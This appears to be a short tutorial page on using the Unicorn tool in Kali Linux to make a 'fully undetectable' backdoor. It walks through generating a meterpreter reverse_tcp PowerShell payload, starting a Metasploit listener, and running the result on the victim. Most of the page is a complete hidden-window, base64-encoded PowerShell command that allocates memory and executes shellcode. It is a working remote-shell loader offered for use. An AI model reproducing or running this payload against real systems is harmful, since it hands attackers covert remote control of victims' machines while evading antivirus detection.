UNICORN TOOL KALI LINUX {MAKING FUD BACKDOOR}

Unicorn tool Kali Linux {MAKING FUD BACKDOOR}

HOWTO: USE UNICORN IN KALIUnicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18


1. download from https://github.com/trustedsec/unicorn
# git clone https://github.com/trustedsec/unicorn

2.  Create powershell command with unicorn
# python unicorn.py windows/meterpreter/reverse_tcp <ip> 443
3. Run the Metasploit Listener with rc file that create by Unicorn (Or you can run manual by yourselves)
# msfconsole -r unicorn.rc
4. Copy powershell command that was generate in powershell_attacks.txt and run it in client side.
# powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4ADYAYgAsADAAeABiADIALAAwAHgAMwA1ACwAMAB4ADkAZAAsADAAeABkAGIALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeAA5AGUALAAwAHgANABlACwAMAB4AGQAZAAsADAAeAAxAGYALAAwAHgANgAwACwAMAB4AGEAZgAsADAAeAAxAGUALAAwAHgANAAwACwAMAB4AGUAOQAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4ADQAMAAsADAAeAA4AGQALAAwAHgAMQBmACwAMAB4ADAAMAAsADAAeAA3ADAALAAwAHgAYwA2ACwAMAB4ADcAMgAsADAAeABhAGQALAAwAHgAZgBiACwAMAB4ADgAYQAsADAAeAA2ADYALAAwAHgAMgA2ACwAMAB4ADgAOQAsADAAeAAwADIALAAwAHgAOAA4ACwAMAB4ADgAZgAsADAAeAAyADQALAAwAHgANwA0ACwAMAB4AGEANwAsADAAeAAxADAALAAwAHgAMQA0ACwAMAB4ADQANAAsADAAeABhADYALAAwAHgAOQAyACwAMAB4ADYANwAsADAAeAA5ADgALAAwAHgAMAA4ACwAMAB4AGEAYQAsADAAeABhADcALAAwAHgAZQBkACwAMAB4ADQAOQAsADAAeABlAGIALAAwAHgAZABhACwAMAB4ADEAZgAsADAAeAAxAGIALAAwAHgAYQA0ACwAMAB4ADkAMQAsADAAeAA4AGQALAAwAHgAOABjACwAMAB4AGMAMQAsADAAeABlAGMALAAwAHgAMABkACwAMAB4ADIANgAsADAAeAA5ADkALAAwAHgAZQAxACwAMAB4ADEANQAsADAAeABkAGIALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAAzADQALAAwAHgANABhACwAMAB4AGUAMAAsADAAeAA1AGEALAAwAHgAOQA2ACwAMAB4ADYAYwAsADAAeAAyADUALAAwAHgAZAA3ACwAMAB4ADkAZgAsADAAeAA3ADYALAAwAHgAMgBhACwAMAB4AGQAMgAsADAAeAA1ADYALAAwAHgAMABjACwAMAB4ADkAOAAsADAAeABhADgALAAwAHgANgA5ACwAMAB4AGMANAAsADAAeABkADAALAAwAHgANQAxACwAMAB4AGMANQAsADAAeAAyADkALAAwAHgAZABkACwAMAB4AGEAMwAsADAAeAAxADQALAAwAHgANgBkACwAMAB4AGQAYQAsADAAeAA1AGIALAAwAHgANgAzACwAMAB4ADgANwAsADAAeAAxADgALAAwAHgAZQAxACwAMAB4ADcAMwAsADAAeAA1AGMALAAwAHgANgAyACwAMAB4ADMAZAAsADAAeABmADYALAAwAHgANAA3ACwAMAB4AGMANAAsADAAeABiADYALAAwAHgAYQAwACwAMAB4AGEAMwAsADAAeABmADQALAAwAHgAMQBiACwAMAB4ADMANgAsADAAeAAyADcALAAwAHgAZgBhACwAMAB4AGQAMAAsADAAeAAzAGQALAAwAHgANgBmACwAMAB4ADEAZgAsADAAeABlADYALAAwAHgAOQAyACwAMAB4ADEAYgAsADAAeAAxAGIALAAwAHgANgAzACwAMAB4ADEANQAsADAAeABjAGMALAAwAHgAYQBkACwAMAB4ADMANwAsADAAeAAzADEALAAwAHgAYwA4ACwAMAB4AGYANgAsADAAeABlAGMALAAwAHgANQA4ACwAMAB4ADQAOQAsADAAeAA1ADMALAAwAHgANAAyACwAMAB4ADYANQAsADAAeAA4ADkALAAwAHgAMwBjACwAMAB4ADMAYgAsADAAeABjADMALAAwAHgAYwAxACwAMAB4AGQAMQAsADAAeAAyADgALAAwAHgANwBlACwAMAB4ADgAOAAsADAAeABiAGQALAAwAHgAOQBkACwAMAB4AGIAMgAsADAAeAAzADMALAAwAHgAMwBlACwAMAB4ADgAYQAsADAAeABjADUALAAwAHgANAAwACwAMAB4ADAAYwAsADAAeAAxADUALAAwAHgANwBkACwAMAB4AGMAZgAsADAAeAAzAGMALAAwAHgAZABlACwAMAB4ADUAYgAsADAAeAAwADgALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAAxAGIALAAwAHgAOAA2ACwAMAB4AGIAZAAsADAAeABmADYALAAwAHgANQBiACwAMAB4ADgAZQAsADAAeAA3ADkALAAwAHgAYQAyACwAMAB4ADAAYgAsADAAeABiADgALAAwAHgAYQA4ACwAMAB4AGMAYgAsADAAeABjADAALAAwAHgAMwA4ACwAMAB4ADUANAAsADAAeAAxAGUALAAwAHgANAA2ACwAMAB4ADYAOQAsADAAeABmAGEALAAwAHgAZgAxACwAMAB4ADIANgAsADAAeABkADkALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABjAGUALAAwAHgAMwAzACwAMAB4ADMANQAsADAAeAA5AGQALAAwAHgAZQBlACwAMAB4ADMAYgAsADAAeAA5AGYALAAwAHgAYgA2ACwAMAB4ADgANAAsADAAeABjADYALAAwAHgANAA4ACwAMAB4AGIAMwAsADAAeABhADcALAAwAHgAYwA4ACwAMAB4ADEAMAAsADAAeABhAGIALAAwAHgANQA1ACwAMAB4AGMAYgAsADAAeAAyADEALAAwAHgAOQA3ACwAMAB4AGQAMAAsADAAeAAyAGQALAAwAHgANABiACwAMAB4AGYANwAsADAAeABiADQALAAwAHgAZQA2ACwAMAB4AGUANAAsADAAeAA2AGUALAAwAHgAOQBkACwAMAB4ADcAZAAsADAAeAA5ADQALAAwAHgANgBmACwAMAB4ADAAOAAsADAAeABmADgALAAwAHgAOQA2ACwAMAB4AGUANAAsADAAeABiADgALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeAAwAGQALAAwAHgAYwA5ACwAMAB4AGUAZQAsADAAeAA4AGUALAAwAHgAMwAyACwAMAB4ADMAMQAsADAAeABlAGYALAAwAHgANABlACwAMAB4ADIANwAsADAAeAAzADEALAAwAHgAOAA1ACwAMAB4ADQAYQAsADAAeABlADEALAAwAHgANgA2ACwAMAB4ADMAMQAsADAAeAA1ADEALAAwAHgAZAA0ACwAMAB4ADQAMAAsADAAeAA5AGUALAAwAHgAYQBhACwAMAB4ADMAMwAsADAAeABkADMALAAwAHgAZAA5ACwAMAB4ADUANQAsADAAeABjADIALAAwAHgAMwBhACwAMAB4ADkAMgAsADAAeAA2ADAALAAwAHgANQAwACwAMAB4AGYAYwAsADAAeABjAGQALAAwAHgAOABjACwAMAB4AGIANAAsADAAeABmAGMALAAwAHgAMABkACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZgBjACwAMAB4ADYANQAsADAAeABiAGIALAAwAHgAYgBhACwAMAB4AGEAZgAsADAAeAA5ADAALAAwAHgAYwA0ACwAMAB4ADEANgAsADAAeABkAGMALAAwAHgAMAA4ACwAMAB4ADUAMQAsADAAeAA5ADkALAAwAHgAYgA0ACwAMAB4AGYAZAAsADAAeABmADIALAAwAHgAZgAxACwAMAB4ADMAYQAsADAAeABkAGIALAAwAHgAMwA1ACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgAMABlACwAMAB4ADQANgAsADAAeAA5ADkALAAwAHgAMwA5ACwAMAB4AGMAZgAsADAAeAA4AGEALAAwAHgANQBiACwAMAB4AGYAYQAsADAAeAAwADYALAAwAHgAYwBiACwAMAB4ADIAOQAsADAAeAAxADUALAAwAHgAOQBiACwAMAB4ADYAOAAsADAAeAAyADEALAAwAHgANQAwACwAMAB4AGIAZQAsADAAeABkADkALAAwAHgAYQA4ACwAMAB4ADkAYQAsADAAeABlAGMALAAwAHgAMQBhACwAMAB4AGYAOQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A

Comments